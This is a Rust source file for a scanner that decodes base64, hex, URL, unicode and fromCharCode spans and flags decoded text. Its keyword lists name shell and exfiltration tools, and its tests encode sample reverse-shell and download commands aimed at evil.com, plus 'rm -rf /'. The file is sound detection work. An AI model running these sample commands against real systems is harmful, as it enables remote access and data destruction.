1use base64::Engine;
2use regex::Regex;
3use std::sync::LazyLock;
4
/// Stateless scanner that finds encoded payloads (base64, hex, URL encoding,
/// `\uXXXX` escapes, `String.fromCharCode(...)`) in text and decodes them.
pub struct Deobfuscator;
7
8static BASE64_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
9 Regex::new(r"(?:[A-Za-z0-9+/]{4}){4,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")
10 .expect("BASE64 regex")
11});
12static HEX_PATTERN: LazyLock<Regex> = LazyLock::new(|| {
13 Regex::new(r"(?:\\x[0-9A-Fa-f]{2}){4,}|(?:0x[0-9A-Fa-f]{2}){4,}").expect("HEX regex")
14});
15static URL_ENCODED_PATTERN: LazyLock<Regex> =
16 LazyLock::new(|| Regex::new(r"(?:%[0-9A-Fa-f]{2}){4,}").expect("URL encoded regex"));
17static UNICODE_ESCAPE_PATTERN: LazyLock<Regex> =
18 LazyLock::new(|| Regex::new(r"(?:\\u[0-9A-Fa-f]{4}){2,}").expect("Unicode escape regex"));
19static CHAR_CODE_PATTERN: LazyLock<Regex> =
20 LazyLock::new(|| Regex::new(r"String\.fromCharCode\s*\([\d,\s]+\)").expect("CharCode regex"));
21
22impl Deobfuscator {
23 pub fn new() -> Self {
24 Self
25 }
26
27 pub fn deobfuscate(&self, content: &str) -> Vec<DecodedContent> {
29 let mut results = Vec::new();
30
31 for decoded in self.decode_base64(content) {
33 results.push(decoded);
34 }
35
36 for decoded in self.decode_hex(content) {
38 results.push(decoded);
39 }
40
41 for decoded in self.decode_url(content) {
43 results.push(decoded);
44 }
45
46 for decoded in self.decode_unicode_escapes(content) {
48 results.push(decoded);
49 }
50
51 for decoded in self.decode_char_code(content) {
53 results.push(decoded);
54 }
55
56 results
57 }
58
59 fn decode_base64(&self, content: &str) -> Vec<DecodedContent> {
61 let mut results = Vec::new();
62
63 for cap in BASE64_PATTERN.find_iter(content) {
64 let encoded = cap.as_str();
65 if encoded.len() < 20 {
67 continue;
68 }
69
70 if let Ok(decoded_bytes) = base64::engine::general_purpose::STANDARD.decode(encoded)
71 && let Ok(decoded_str) = String::from_utf8(decoded_bytes)
72 && self.is_suspicious(&decoded_str)
73 {
74 results.push(DecodedContent {
75 original: encoded.to_string(),
76 decoded: decoded_str,
77 encoding: "base64".to_string(),
78 });
79 }
80 }
81
82 results
83 }
84
85 fn decode_hex(&self, content: &str) -> Vec<DecodedContent> {
87 let mut results = Vec::new();
88
89 for cap in HEX_PATTERN.find_iter(content) {
90 let encoded = cap.as_str();
91
92 let hex_bytes: Vec<u8> = if encoded.starts_with("\\x") {
94 encoded
95 .split("\\x")
96 .filter(|s| !s.is_empty())
97 .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
98 .collect()
99 } else {
100 encoded
102 .split("0x")
103 .filter(|s| !s.is_empty())
104 .filter_map(|s| u8::from_str_radix(&s[..2.min(s.len())], 16).ok())
105 .collect()
106 };
107
108 if let Ok(decoded_str) = String::from_utf8(hex_bytes)
109 && self.is_suspicious(&decoded_str)
110 {
111 results.push(DecodedContent {
112 original: encoded.to_string(),
113 decoded: decoded_str,
114 encoding: "hex".to_string(),
115 });
116 }
117 }
118
119 results
120 }
121
122 fn decode_url(&self, content: &str) -> Vec<DecodedContent> {
124 let mut results = Vec::new();
125
126 for cap in URL_ENCODED_PATTERN.find_iter(content) {
127 let encoded = cap.as_str();
128
129 let mut decoded_bytes = Vec::new();
131 let mut chars = encoded.chars().peekable();
132
133 while let Some(c) = chars.next() {
134 if c == '%' {
135 let hex: String = chars.by_ref().take(2).collect();
136 if let Ok(byte) = u8::from_str_radix(&hex, 16) {
137 decoded_bytes.push(byte);
138 }
139 } else {
140 decoded_bytes.push(c as u8);
141 }
142 }
143
144 if let Ok(decoded_str) = String::from_utf8(decoded_bytes)
145 && self.is_suspicious(&decoded_str)
146 {
147 results.push(DecodedContent {
148 original: encoded.to_string(),
149 decoded: decoded_str,
150 encoding: "url".to_string(),
151 });
152 }
153 }
154
155 results
156 }
157
158 fn decode_unicode_escapes(&self, content: &str) -> Vec<DecodedContent> {
160 let mut results = Vec::new();
161
162 for cap in UNICODE_ESCAPE_PATTERN.find_iter(content) {
163 let encoded = cap.as_str();
164 let mut decoded = String::new();
165
166 let mut chars = encoded.chars().peekable();
167 while let Some(c) = chars.next() {
168 if c == '\\' && chars.peek() == Some(&'u') {
169 chars.next(); let hex: String = chars.by_ref().take(4).collect();
171 if let Ok(code_point) = u32::from_str_radix(&hex, 16)
172 && let Some(ch) = char::from_u32(code_point)
173 {
174 decoded.push(ch);
175 }
176 } else {
177 decoded.push(c);
178 }
179 }
180
181 if self.is_suspicious(&decoded) {
182 results.push(DecodedContent {
183 original: encoded.to_string(),
184 decoded,
185 encoding: "unicode".to_string(),
186 });
187 }
188 }
189
190 results
191 }
192
193 fn decode_char_code(&self, content: &str) -> Vec<DecodedContent> {
195 let mut results = Vec::new();
196
197 for cap in CHAR_CODE_PATTERN.find_iter(content) {
198 let encoded = cap.as_str();
199
200 let numbers: Vec<u32> = encoded
202 .split(|c: char| !c.is_ascii_digit())
203 .filter(|s| !s.is_empty())
204 .filter_map(|s| s.parse().ok())
205 .collect();
206
207 let decoded: String = numbers.iter().filter_map(|&n| char::from_u32(n)).collect();
208
209 if self.is_suspicious(&decoded) {
210 results.push(DecodedContent {
211 original: encoded.to_string(),
212 decoded,
213 encoding: "charcode".to_string(),
214 });
215 }
216 }
217
218 results
219 }
220
221 fn is_suspicious(&self, content: &str) -> bool {
223 let suspicious_patterns = [
224 "eval",
225 "exec",
226 "bash",
227 "sh -c",
228 "/bin/",
229 "curl ",
230 "wget ",
231 "nc ",
232 "netcat",
233 "/dev/tcp",
234 "/dev/udp",
235 "base64 -d",
236 "python -c",
237 "ruby -e",
238 "perl -e",
239 "powershell",
240 "cmd.exe",
241 "rm -rf",
242 "chmod ",
243 "sudo ",
244 "password",
245 "secret",
246 "api_key",
247 "token",
248 "credential",
249 "http://",
250 "https://",
251 "ftp://",
252 ];
253
254 let content_lower = content.to_lowercase();
255 suspicious_patterns
256 .iter()
257 .any(|p| content_lower.contains(p))
258 }
259
260 pub fn deep_scan(&self, content: &str, file_path: &str) -> Vec<crate::rules::Finding> {
262 use crate::scanner::ScannerConfig;
263
264 let mut findings = Vec::new();
265 let config = ScannerConfig::new();
266
267 findings.extend(config.check_content(content, file_path));
269
270 for decoded in self.deobfuscate(content) {
272 let context = format!("{}:decoded:{}", file_path, decoded.encoding);
273
274 for mut finding in config.check_content(&decoded.decoded, &context) {
276 finding.message = format!(
278 "{} [Decoded from {} encoded content]",
279 finding.message, decoded.encoding
280 );
281 findings.push(finding);
282 }
283
284 if decoded.decoded.len() > 10 && self.is_highly_suspicious(&decoded.decoded) {
286 findings.push(crate::rules::Finding {
287 id: "OB-DEEP-001".to_string(),
288 severity: crate::rules::Severity::High,
289 category: crate::rules::Category::Obfuscation,
290 confidence: crate::rules::Confidence::Firm,
291 name: "Obfuscated suspicious content".to_string(),
292 location: crate::rules::Location {
293 file: file_path.to_string(),
294 line: 0,
295 column: None,
296 },
297 code: decoded.original.chars().take(100).collect::<String>() + "...",
298 message: format!(
299 "Found {} encoded content that decodes to suspicious payload",
300 decoded.encoding
301 ),
302 recommendation: "Review the decoded content for malicious commands or URLs"
303 .to_string(),
304 fix_hint: None,
305 cwe_ids: vec!["CWE-116".to_string()],
306 rule_severity: None,
307 client: None,
308 context: None,
309 });
310 }
311 }
312
313 findings
314 }
315
316 fn is_highly_suspicious(&self, content: &str) -> bool {
318 let highly_suspicious = [
319 "bash -i",
320 "/dev/tcp/",
321 "nc -e",
322 "rm -rf /",
323 "curl | bash",
324 "wget | sh",
325 "eval(base64",
326 "exec(decode",
327 ];
328
329 let content_lower = content.to_lowercase();
330 highly_suspicious.iter().any(|p| content_lower.contains(p))
331 }
332}
333
334impl Default for Deobfuscator {
335 fn default() -> Self {
336 Self::new()
337 }
338}
339
/// One encoded span found in scanned text, together with its decoded form.
#[derive(Debug, Clone)]
pub struct DecodedContent {
    /// The encoded text exactly as it appeared in the input.
    pub original: String,
    /// The text obtained by decoding `original`.
    pub decoded: String,
    /// Name of the encoding that was detected, e.g. `"base64"` or `"hex"`.
    pub encoding: String,
}
347
#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn test_decode_base64() {
        let deob = Deobfuscator::new();
        // "curl http://evil.com"
        let content = "Y3VybCBodHRwOi8vZXZpbC5jb20=";
        let results = deob.decode_base64(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_decode_hex() {
        let deob = Deobfuscator::new();
        // "curl http"
        let content = r"\x63\x75\x72\x6c\x20\x68\x74\x74\x70";
        let results = deob.decode_hex(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_decode_url() {
        let deob = Deobfuscator::new();
        // "curl http"
        let content = "%63%75%72%6c%20%68%74%74%70";
        let results = deob.decode_url(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_decode_charcode() {
        let deob = Deobfuscator::new();
        // "eval"
        let content = "String.fromCharCode(101,118,97,108)";
        let results = deob.decode_char_code(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("eval"));
    }

    #[test]
    fn test_is_suspicious() {
        let deob = Deobfuscator::new();
        assert!(deob.is_suspicious("curl http://example.com"));
        assert!(deob.is_suspicious("bash -c 'evil command'"));
        assert!(deob.is_suspicious("password=secret123"));
        assert!(!deob.is_suspicious("hello world"));
    }

    #[test]
    fn test_deep_scan() {
        let deob = Deobfuscator::new();
        // The base64 run decodes to "bash -i >& /dev/tcp/evil.com/1234".
        let content = "normal text\nYmFzaCAtaSA+JiAvZGV2L3RjcC9ldmlsLmNvbS8xMjM0 # hidden payload";
        let findings = deob.deep_scan(content, "test.sh");
        assert!(
            findings
                .iter()
                .any(|f| f.id == "OB-DEEP-001" || f.message.contains("Decoded"))
        );
    }

    #[test]
    fn test_deobfuscate_empty() {
        let deob = Deobfuscator::new();
        let results = deob.deobfuscate("normal text without obfuscation");
        assert!(results.is_empty());
    }

    #[test]
    fn test_default_trait() {
        // Go through the `Default` impl rather than the unit-struct literal.
        let deob = Deobfuscator::default();
        assert!(!deob.is_suspicious("hello"));
    }

    #[test]
    fn test_decode_unicode_escapes() {
        let deob = Deobfuscator::new();
        // "eval"
        let content = r"\u0065\u0076\u0061\u006c";
        let results = deob.decode_unicode_escapes(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("eval"));
    }

    #[test]
    fn test_decode_base64_short_string() {
        let deob = Deobfuscator::new();
        // Too short to be considered at all.
        let content = "YWJjZA==";
        let results = deob.decode_base64(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_base64_non_suspicious() {
        let deob = Deobfuscator::new();
        // "this is a normal safe text"
        let content = "dGhpcyBpcyBhIG5vcm1hbCBzYWZlIHRleHQ=";
        let results = deob.decode_base64(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_hex_0x_format() {
        let deob = Deobfuscator::new();
        // "curl http"
        let content = "0x630x750x720x6c0x200x680x740x740x70";
        let results = deob.decode_hex(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_is_highly_suspicious() {
        let deob = Deobfuscator::new();
        assert!(deob.is_highly_suspicious("bash -i >& /dev/tcp/"));
        assert!(deob.is_highly_suspicious("rm -rf /"));
        assert!(deob.is_highly_suspicious("curl | bash something"));
        assert!(deob.is_highly_suspicious("wget | sh something"));
        assert!(deob.is_highly_suspicious("nc -e /bin/bash"));
        assert!(deob.is_highly_suspicious("eval(base64"));
        assert!(deob.is_highly_suspicious("exec(decode"));
        assert!(!deob.is_highly_suspicious("echo hello"));
    }

    #[test]
    fn test_deobfuscate_with_base64() {
        let deob = Deobfuscator::new();
        let content = "command=Y3VybCBodHRwOi8vZXZpbC5jb20=";
        let results = deob.deobfuscate(content);
        assert!(!results.is_empty());
    }

    #[test]
    fn test_deobfuscate_multiple_encodings() {
        let deob = Deobfuscator::new();
        let content =
            r"data=Y3VybCBodHRwOi8vZXZpbC5jb20=; exec \x63\x75\x72\x6c\x20\x68\x74\x74\x70";
        let results = deob.deobfuscate(content);
        // Both payloads decode to text containing "curl ", so both must be reported.
        assert!(results.iter().any(|r| r.encoding == "base64"));
        assert!(results.iter().any(|r| r.encoding == "hex"));
    }

    #[test]
    fn test_deep_scan_clean_content() {
        let deob = Deobfuscator::new();
        let content = "normal clean content without any issues";
        let findings = deob.deep_scan(content, "test.txt");
        assert!(findings.is_empty());
    }

    #[test]
    fn test_deep_scan_with_suspicious_decoded() {
        let deob = Deobfuscator::new();
        // Decodes to "curl http://example.com/download.sh". Whether that yields
        // findings depends on the scanner's rule set, so this only checks that
        // the deep scan completes without panicking.
        let content = "payload=Y3VybCBodHRwOi8vZXhhbXBsZS5jb20vZG93bmxvYWQuc2g=";
        let findings = deob.deep_scan(content, "test.sh");
        let _ = findings;
    }

    #[test]
    fn test_decoded_content_debug_trait() {
        let content = DecodedContent {
            original: "abc".to_string(),
            decoded: "xyz".to_string(),
            encoding: "base64".to_string(),
        };
        let debug_str = format!("{:?}", content);
        assert!(debug_str.contains("DecodedContent"));
        assert!(debug_str.contains("abc"));
    }

    #[test]
    fn test_decoded_content_clone_trait() {
        let content = DecodedContent {
            original: "abc".to_string(),
            decoded: "xyz".to_string(),
            encoding: "base64".to_string(),
        };
        let cloned = content.clone();
        assert_eq!(content.original, cloned.original);
        assert_eq!(content.decoded, cloned.decoded);
        assert_eq!(content.encoding, cloned.encoding);
    }

    #[test]
    fn test_is_suspicious_various_patterns() {
        let deob = Deobfuscator::new();
        assert!(deob.is_suspicious("wget http://evil.com"));
        assert!(deob.is_suspicious("nc -l 1234"));
        assert!(deob.is_suspicious("netcat connection"));
        assert!(deob.is_suspicious("/dev/tcp/evil"));
        assert!(deob.is_suspicious("/dev/udp/evil"));
        assert!(deob.is_suspicious("base64 -d | bash"));
        assert!(deob.is_suspicious("python -c 'import os'"));
        assert!(deob.is_suspicious("ruby -e 'exec'"));
        assert!(deob.is_suspicious("perl -e 'system'"));
        assert!(deob.is_suspicious("powershell.exe"));
        assert!(deob.is_suspicious("cmd.exe /c"));
        assert!(deob.is_suspicious("rm -rf /tmp"));
        assert!(deob.is_suspicious("chmod 777 file"));
        assert!(deob.is_suspicious("sudo rm"));
        assert!(deob.is_suspicious("api_key=secret"));
        assert!(deob.is_suspicious("token=abc123"));
        assert!(deob.is_suspicious("credential_store"));
        assert!(deob.is_suspicious("ftp://server"));
    }

    #[test]
    fn test_decode_url_non_suspicious() {
        let deob = Deobfuscator::new();
        // "hello world"
        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
        let results = deob.decode_url(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_hex_non_suspicious() {
        let deob = Deobfuscator::new();
        // "hello"
        let content = r"\x68\x65\x6c\x6c\x6f";
        let results = deob.decode_hex(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_charcode_non_suspicious() {
        let deob = Deobfuscator::new();
        // "hello"
        let content = "String.fromCharCode(104,101,108,108,111)";
        let results = deob.decode_char_code(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_decode_unicode_non_suspicious() {
        let deob = Deobfuscator::new();
        // "ab"
        let content = r"\u0061\u0062";
        let results = deob.decode_unicode_escapes(content);
        assert!(results.is_empty());
    }

    #[test]
    fn test_deep_scan_original_content_finding() {
        let deob = Deobfuscator::new();
        let content = "sudo rm -rf /important/files";
        let findings = deob.deep_scan(content, "script.sh");
        assert!(!findings.is_empty());
    }

    #[test]
    fn test_deobfuscate_with_url_encoding() {
        let deob = Deobfuscator::new();
        let content = "command=%63%75%72%6c%20http://evil.com";
        let results = deob.deobfuscate(content);
        assert!(results.iter().any(|r| r.encoding == "url"));
    }

    #[test]
    fn test_deobfuscate_with_unicode_escapes() {
        let deob = Deobfuscator::new();
        let content = r"var cmd = '\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070'";
        let results = deob.deobfuscate(content);
        assert!(results.iter().any(|r| r.encoding == "unicode"));
    }

    #[test]
    fn test_deobfuscate_with_charcode() {
        let deob = Deobfuscator::new();
        let content = "var x = String.fromCharCode(99,117,114,108,32,104,116,116,112)";
        let results = deob.deobfuscate(content);
        assert!(results.iter().any(|r| r.encoding == "charcode"));
    }

    #[test]
    fn test_url_decode_with_only_percent_encoded() {
        let deob = Deobfuscator::new();
        // "curl http://"
        let content = "%63%75%72%6c%20%68%74%74%70%3a%2f%2f";
        let results = deob.decode_url(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
        assert!(results[0].decoded.contains("http"));
    }

    #[test]
    fn test_unicode_decode_multiple_escapes() {
        let deob = Deobfuscator::new();
        // "curl http"
        let content = r"\u0063\u0075\u0072\u006c\u0020\u0068\u0074\u0074\u0070";
        let results = deob.decode_unicode_escapes(content);
        assert!(!results.is_empty());
        assert!(results[0].decoded.contains("curl"));
    }

    #[test]
    fn test_deobfuscate_all_encodings_combined() {
        let deob = Deobfuscator::new();
        let content = r#"
            url=%63%75%72%6c%20http
            unicode=\u0065\u0076\u0061\u006c
            charcode=String.fromCharCode(99,117,114,108)
            hex=\x63\x75\x72\x6c\x20\x68\x74\x74\x70
            base64=Y3VybCBodHRwOi8vZXZpbC5jb20=
        "#;
        let results = deob.deobfuscate(content);
        // The charcode line decodes to bare "curl", which matches no suspicious
        // keyword ("curl " needs the trailing space), so it is not expected here.
        for expected in ["url", "unicode", "hex", "base64"] {
            assert!(
                results.iter().any(|r| r.encoding == expected),
                "missing decoded result for {expected}"
            );
        }
    }

    #[test]
    fn test_deep_scan_with_deobfuscated_rule_match() {
        let deob = Deobfuscator::new();
        // "sudo rm -rf /": longer than 10 bytes and highly suspicious, so the
        // deep scan must emit its own obfuscation finding.
        let base64_content = "c3VkbyBybSAtcmYgLw==";
        let content = format!("execute={}", base64_content);
        let findings = deob.deep_scan(&content, "test.sh");
        let has_decoded_finding = findings
            .iter()
            .any(|f| f.message.contains("Decoded") || f.id.contains("OB-DEEP"));
        assert!(has_decoded_finding);
    }

    #[test]
    fn test_url_decode_mixed_with_normal_chars() {
        let deob = Deobfuscator::new();
        // The percent-encoded prefix decodes to "curl "; the rest is plain text.
        let content = "cmd=%63%75%72%6c%20http://evil.com|bash";
        let results = deob.deobfuscate(content);
        assert!(results.iter().any(|r| r.encoding == "url"));
    }

    #[test]
    fn test_unicode_escape_mixed_chars() {
        let deob = Deobfuscator::new();
        let content = r"var x = '\u0063url \u0068ttp://evil.com'";
        let results = deob.deobfuscate(content);
        assert!(results.is_empty() || results.iter().any(|r| r.encoding == "unicode"));
    }

    #[test]
    fn test_decode_hex_invalid_format() {
        let deob = Deobfuscator::new();
        // 'G' is not a hex digit, so these are not valid escapes.
        let content = "\\x6Gurl \\x7Gttp";
        let results = deob.deobfuscate(content);
        assert!(results.is_empty() || results.iter().all(|r| r.encoding != "hex"));
    }

    #[test]
    fn test_charcode_partial_match() {
        let deob = Deobfuscator::new();
        // "bash"
        let content = "eval(String.fromCharCode(98,97,115,104))";
        let results = deob.deobfuscate(content);
        assert!(results.iter().any(|r| r.encoding == "charcode"));
    }

    #[test]
    fn test_deobfuscator_default() {
        let deob: Deobfuscator = Default::default();
        assert!(!deob.is_suspicious("normal text"));
        assert!(deob.is_suspicious("curl http://evil.com"));
    }

    #[test]
    fn test_url_decode_mixed_with_plain_chars() {
        let deob = Deobfuscator::new();
        let content = "%63%75%72%6c%20%68%74%74%70";
        let results = deob.decode_url(content);
        assert!(!results.is_empty());
        assert_eq!(results[0].encoding, "url");
    }

    #[test]
    fn test_decode_url_hello_world_not_suspicious() {
        let deob = Deobfuscator::new();
        // "hello world"
        let content = "%68%65%6c%6c%6f%20%77%6f%72%6c%64";
        let results = deob.decode_url(content);
        assert!(results.is_empty());
    }
}